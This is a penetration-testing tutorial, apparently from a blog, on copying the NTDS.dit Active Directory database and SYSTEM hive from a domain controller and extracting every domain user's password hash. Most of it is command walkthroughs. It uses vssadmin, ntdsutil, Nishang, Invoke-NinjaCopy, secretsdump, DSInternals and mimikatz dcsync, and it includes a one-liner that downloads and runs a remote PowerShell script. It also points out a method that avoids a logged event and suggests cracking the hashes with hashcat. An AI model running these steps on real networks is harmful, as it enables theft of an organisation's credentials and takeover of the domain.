Intranet penetration test: get domain hash value from NTDS.dit

Category: Tag:

In this article, we will demonstrate how to obtain the Ntds.dit file on the domain controller and extract the domain account and password hash.

Ntds.dit
In a domain environment, Active Directory is a component that provides directory services in the domain, which can help users quickly and accurately find the information they need from the directory. In a large-scale network, many objects in the network, such as computers, users, user groups, printers, shared files, etc., should be sorted and stored in a large warehouse in an orderly manner, and the information should be indexed and searched again. , Manage and use these resource objects. The database with this hierarchical structure is the Active Directory database.

The Ntds.dit file is a binary file on the domain controller in the domain environment. It is the main Active Directory database. Its file path is %SystemRoot%\ntds\ntds.dit of the domain controller. Active Directory will always access this file. So the file is forbidden to be read. Ntds.dit includes but is not limited to information about domain users, groups and group membership and credential information, GPP, etc. It includes the password hash values ​​of all users in the domain. In order to further protect the password hash values, these hash values ​​are encrypted using the key stored in the SYSTEM registry hive.

In a non-domain environment, that is, in a workgroup environment, the user’s password and other information are stored in the SAM file. If you want to crack the SAM file and the Ntds.dit file, you need to have a System file. Like the SAM file, Ntds.dit is locked by the Windows system by default.

Use VSS technology to obtain NTDS.dit file
In general, Ntds.dit is locked by the Windows system by default. If you want to read the file, you must use the Volume Shadow Copy Service (VSS) to get a copy of the Ntds.dit file. Volume Shadow Copy Service (VSS) is essentially a kind of snapshot technology, mainly used for backup and recovery, even if the target file is locked.

The basic steps to obtain Ntds.dit are as follows:

Create a shadow copy of the target host (including all files on Windows)
Then copy ntds.dit in the created shadow copy
Finally delete the shadow copy created by the dish
Use the vssadmin tool
vssadmin is a command line management tool for Volume Shadow Copy Service on Windows. It can be used to create and delete shadow copies, list shadow copy information, display all installed shadow copy writers and providers, and change The size of the storage space of the shadow copy, etc.

It applies to: Windows 10, Windows 8.1, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, Windows Server 2008

For details, please refer to: https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/vssadmin

The process of extracting the ntds.dit file from the domain controller using the vssadmin command is as follows, which requires domain administrator authority to operate:

1. Execute the following command on the domain controller that has obtained permission to create a shadow copy of the C drive:

vssadmin create shadow /for=C:

2. Then copy ntds.dit to C drive in the created shadow copy:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\ntds.dit

At this point, a copy of Ntds.dit was successfully copied.

3. Finally delete the shadow copy just created:

vssadmin delete shadows /for=c: /quiet

Use the vssown.vbs script
Download link: https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

https://github.com/borigue/ptscripts/tree/master/windows

The script essentially operates ShadowCopy through wmi, and its function is similar to vssadmin, which can be used to create and delete shadow copies, and start and stop the shadow copy service.

The process of extracting the ntds.dit file from the domain controller using the vssown.vbs script is as follows, which requires domain administrator authority to operate:

1. First, execute the following command on the domain controller to start the volume shadow copy service:

cscript vssown.vbs /start

The cscript command is dedicated to executing scripts to be run in a command line environment.

2. Then execute the following command to create a shadow copy of drive C:

cscript vssown.vbs /create c

Execute the following command to list the currently created shadow copies:

cscript vssown.vbs /list

As shown in the figure above, we can see a shadow copy with ID {D0E1B1B0-96B3-4A5E-988A-4DA2738A078D}, and the storage location is \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2.

3. Then copy ntds.dit to C drive in the created shadow copy:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit C:\ntds.dit

4. After getting the copy of Ntds.dit, delete the shadow copy just created:

cscript vssown.vbs /delete <ID>
cscript vssown.vbs /delete {D0E1B1B0-96B3-4A5E-988A-4DA2738A078D}

Use the Ntdsutil.exe tool
Ntdsutil.exe is a command-line tool that provides management facilities for Active Directory. This tool is installed on the domain controller by default. It can be operated directly on the domain controller or remotely operated on the domain controller through a machine in the domain, but it needs Administrator rights.

You can use Ntdsutil.exe to perform Active Directory database maintenance, manage and control individual host operations, create application directory partitions, and delete elements left by domain controllers that have not been successfully demoted using the Active Directory Installation Wizard (DCPromo.exe) data.

For details, please refer to: https://baike.baidu.com/item/Ntdsutil.exe/740430?fr=aladdin

The process of extracting the ntds.dit file from the domain controller using the Ntdsutil.exe tool is as follows, which requires domain administrator authority to operate:

1. First, execute the following command on the domain controller to create a snapshot:

ntdsutil snapshot "activate instance ntds" create quit quit
The snapshot contains all the files in Windows and will not be affected by the Windows locking mechanism when copying

As shown in the figure above, you can see that a snapshot with ID {f3ce5a64-11d7-4bcf-9858-81442e40d6cb} was successfully created.

Then execute the following command to load the snapshot just created:

ntdsutil snapshot "mount <ID>" quit quit

ntdsutil snapshot "mount {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" quit quit

At this point, the snapshot just created was successfully loaded into the C:\$SNAP_202009291002_VOLUMEC$\ directory in the system:

3. Then execute the following command to copy the Ntds.dit file in the snapshot to C:\ntds.dit:

copy C:\$SNAP_202009291002_VOLUMEC$\windows\ntds\ntds.dit c:\ntds.dit

After we get a copy of the ntds.dit file, we can delete the snapshot we just created and loaded.

4. Finally, execute the following command to unload and delete the previously created and loaded snapshot:

ntdsutil snapshot "mount <ID>" "delete <ID>" quit quit

ntdsutil snapshot "mount {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" "delete {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" quit quit

Create IFM to extract Ntds.dit file
In addition to using the above operations to obtain Ntds.dit, you can also use Ntdsutil.exe to create a media installation set (IFM) to extract the NTDS.dit file. When using ntdsutil to create a media installation set (IFM), it will automatically generate a snapshot, load, copy ntds.dit, the computer’s SAM and SYSTEM files to the target folder, etc., we can use this process to obtain the NTDS.dit file , Requires administrator rights.

Ntdsutil is a command utility that processes Active Directory locally and enables IFM set creation for DCPromo. IFM is used with DCPromo to “install from media”, so the upgraded server does not need to replicate domain data from another DC over the network.

When an IFM is created, the VSS snapshot will be automatically taken, mounted, and the NTDS.DIT file and related data will be copied to the target folder.

Execute the following command in the domain controller:

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

After executing this command, the ntds.dit file will be automatically copied to C:\test\Active Directory\ntds.dit, and the SYSTEM and SECURITY will be copied to the C:\test\registry directory.

 

Then execute the following command to copy ntds.dit to C:\ntds.dit

copy "C:\test\Active Directory\ntds.dit" C:\ntds.dit

Finally, after dragging the files we need to the local, delete the test folder.

Implementation under PowerShell
The Copy-VSS.ps1 script in Nishang can be used to automatically extract the necessary files-NTDS.DIT​​, SAM and SYSTEM. These files will be decompressed to the current working directory or any other specified folder.

Download link: https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1

The script is used as follows:

IEX (New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/Nishang/Gather/Copy-VSS.ps1');Copy-VSS

As shown in the figure above, after successful execution, the SAM, SYSTEM, and Ntds.dit files will be copied to the same directory as the script.

You can also copy the SAM, SYSTEM, Ntds.dit files to the specified directory:

Copy-VSS -DestinationDir C:\

In addition to the Copy-VSS.ps1 script, we can also use the Invoke-NinjaCopy script in PowerSploit

Download link: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

This script is used for “universal copy”, such as the SAM file in the windows host and the Ntds.dit in the domain control. There are a lot of valuable information in the data. Common COPY commands cannot be copied. Use universal copy to copy such files. The script is used as follows:

Invoke-NinjaCopy -Path <Files to be copied> -LocalDestination <Where to save the copied files>

Use this script to copy the Ntds.dit and SYSTEM files:

Import-Module .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\system.hive"

As shown above, the copy is successful.

This method does not call the Volume Shadow Copy service, so no log file 7036 (a sign that the Volume Shadow Copy service enters the running state) is generated.

 

Export SYSTEM file
After exporting ntds.dit, you also need to export SYSTEM and dump system.hive, because the key of ntds.dit is stored in system.hive.

We can use the Copy-VSS.ps1 mentioned above to export the SYSTEM file, or execute the following command to export the system

reg save hklm\system c:\system.hive

Use the tool to export the hash value in the Ntds.dit file
Up to now, we have learned to use various methods to extract the Ntds.dit file. After we have obtained the Ntds.dit file on the domain controller, the next thing to do is to find a way to export it from the Ntds.dit file The hash value of the password hash.

Use Esedbexport and Ntdsxtract tools
(1) Restore ntds.dit and export user table information

First, we need to extract the user table from the NTDS.dit file. Here we need to use the esedbexport in libesedb-tools to complete it for us. Libesedb is a library for accessing Extensible Storage Engine (ESE) Database File (EDB) format. Currently, the ESE database format is used in many different applications, such as Windows Search, Windows Mail, Exchange, Active Directory (NTDS.dit), etc.

Download link: https://github.com/libyal/libesedb/releases

First install esedbexport on kali:

apt-get install autoconf automake autopoint libtool pkg-config      
wget https://github.com/libyal/libesedb/releases/download/20200418/libesedb-experimental-20200418.tar.gz
cd libesedb-experimental-20191220
./configure
make && make install && ldconfig

After the installation is complete, enter the directory where ntds.dit is stored, execute the following command to restore ntds.dit and extract the table information:

esedbexport -m tables ntds.dit        // Extract table information

The table is successfully extracted as shown in the figure above, and a “ntds.dit.export” folder will be generated in the current directory:

In the above figure, we can see that there are many tables, and the tables we need to use later are the two tables datatable.3 and link_table.5.

(2) Derive the domain hash value

Once the tables in ntds.dit are extracted, there are many python tools that can further extract the information in these tables to derive the domain hash value. For example, ntdsxtract can be perfect. This tool can not only extract information related to user objects, group objects, and computer objects, but also delete objects from the NTDS.dit file.

Installation command:

git clone https://github.com/csababarta/ntdsxtract.git
cd ntdsxtract/
python setup.py build && python setup.py install

After the installation is complete, we will put the two tables datatable.3 and link_table.5 in the “ntds.dit.export” folder exported in the previous step and the previously obtained “SYSTEM” file into the ntdsxtract folder. . Then we can execute the following command to export all users and hash values in the domain to the result.txt file

dsusers.py <datatable> <link_table> <output_dir> --syshive <systemhive> --passwordhashes <format options>      // Command format

python dsusers.py datatable.3 link_table.5 output --syshive system.hive --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee result.txt

The -pwdformat option is to choose what format to extract. There are three options: john (John format), ocl (oclHashcat), and ophc (OphCrack).

As shown in the figure above, all users and password hash values in the domain are successfully exported. The extracted hash value can be cracked with tools such as hashcat. For details, please see another article of mine: “Research on Lateral Movement of Intranet: Obtaining Single-Server Password and Hash in the Domain

Since Ntds.dit includes, but is not limited to, information about domain users, groups and group membership and credential information, GPP, etc., that means we can not only use Ntds.dit to obtain password hashes, but also analyze Ntds.dit to export domain information All other computer information, which is very helpful to our collection of information in the domain.

Ntdsxtract also has a “dscomputers.py” tool that can extract computer information in the domain from the separated table. This is very useful for offline analysis of target information.

In the process of use, it needs to provide datatable, output directory and output file. The format of the output file is csv:

python dscomputers.py datatable.3 computer_output --csvoutfile domain_computers_info.csv

Note that using Ntdsxtract to export the domain hash value in the Ntds.dit table, three files must be provided: datatable.3 and link_table.5 in the ntds.dit.export folder exported by Ntds.dit and the previous Obtained “SYSTEM” file:

Use secretsdump in Impacket
Download link: https://github.com/SecureAuthCorp/impacket

secretsdump.py is a script in the Impacket toolkit, which implements a variety of techniques for dumping confidential data without executing any agent on the remote host. For SAM and LSA Secrets (including cached credentials), we try to read from the registry as much as possible, then save the hives in the target system (%SYSTEMROOT%\Temp directory), and read the rest of the data from there.

secretsdump.py has a local option to parse the Ntds.dit file and extract the hash value and domain information from Ntds.dit. Before that, we must obtain the two files Ntds.dit and SYSTEM. If the conditions are met, you can execute the following command:

python secretsdump.py -system/directory/system.hive -ntds/directory/ntds.dit LOCAL

As shown above, the script successfully displays the NTLM hash values of all users in the domain.

Utilization under PowerShell
The DSInternals PowerShell module provides easy-to-use cmdlets built on the framework. The main functions include offline ntds.dit file operation and querying the domain controller through the Directory Replication Service (DRS) remote protocol.

Download link: https://github.com/MichaelGrafnetter/DSInternals

support system:

  • Windows Server 2012 R2
  • Windows Server 2008 R2
  • Windows 10 64-bit
  • Windows 8.1 64-bit
  • Windows 7 64-bit

Installation and configuration method:

PowerShell 5.0:
Install-Module DSInternals
or
Install-Module -Name DSInternals -RequiredVersion 3.2.1

PowerShell 3.0、4.0:
Unzip the compressed package
cd C:\DSInternals
Import-Module .\DSInternals

For details, please refer to: https://www.powershellgallery.com/packages/dsinternals/3.2.1

To use the DSInternals module to extract the user hash value, we need to get the two files Ntds.dit and SYSTEM first. After exporting and dragging the two files Ntds.dit and SYSTEM to our local, you can execute the following command to obtain all account hashes:

Import-Module DSInternals // Import DSInternals module
// Get all account information:
$key = Get-Bootkey -SystemHivePath’C:\directory\system.hive’
Get-ADDBAccount -All -DBPath’C:\directory\ntds.dit’ -Bootkey $key
Can also guide

You can also export hashes that support the Hashcat format:

$key = Get-Bootkey -SystemHivePath 'C:\directory\system.hive'

Get-ADDBAccount -All -DBPath 'C:\directory\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File hashes.txt

An error was reported on my computer here, so it won’t reproduce.

The methods of extracting hashes mentioned above are all offline extraction. The so-called offline extraction generally requires two steps. The first is to export and download the remote domain controlled ntds.dit using shadow copy and other technologies to the local, and then perform it locally. Extract operation. Let’s summarize the method of extracting the hash in ntds.dit online.

Extract the hash in Ntds.dit online
Use dcsync to obtain and extract the hash in Ntds.dit
DCSync is a feature added by Mimikatz in 2015. It is co-written by Benjamin DELPY gentilkiwi and Vincent LE TOUX. It can use the volume shadow copy service to directly read ndts.dit and export the hash values of all users in the domain. Administrator rights are required.

Mimikatz download address: https://github.com/gentilkiwi/mimikatz

Use Mimikatz’s dcsync function to obtain and extract the hash in Ntds.dit as follows:

1. Run mimikatz on any host in the domain and execute the following command:

lsadump::dcsync /domain:xxx.com /all /csv

lsadump::dcsync /domain:god.org /all /csv

As shown in the figure above, the hash values of all users in the domain are successfully derived.

Implementation under PowerShell
That is, the Invoke-DCSync.ps1 script.

Download link: https://gist.github.com/monoxgas/9d238accd969550136db

The script calls the dcsync function in mimikatz.dll through Invoke-ReflectivePEinjection, and uses dcsync to directly read ntds.dit to obtain the domain user password hash value.

Execute the following command on any host in the domain

Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -DumpForest | ft -wrap -autosize    // Export the hash of all users in the domain

Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize      // Export the hash of the administrator account in the domain

As shown in the figure above, the hashes of all users in the domain are successfully extracted.

Ending…
In this article, we have summarized how to obtain the Ntds.dit file on the domain controller and extract the domain account and password hash.

The obtained password hash can be cracked with tools such as hashcat. For details, please see another article of mine: “Research on Lateral Movement of Intranet: Obtaining Single-Server Password and Hash in the Domain“.

 

Reviews

There are no reviews yet.

Be the first to review “Intranet penetration test: get domain hash value from NTDS.dit”

Your email address will not be published. Required fields are marked *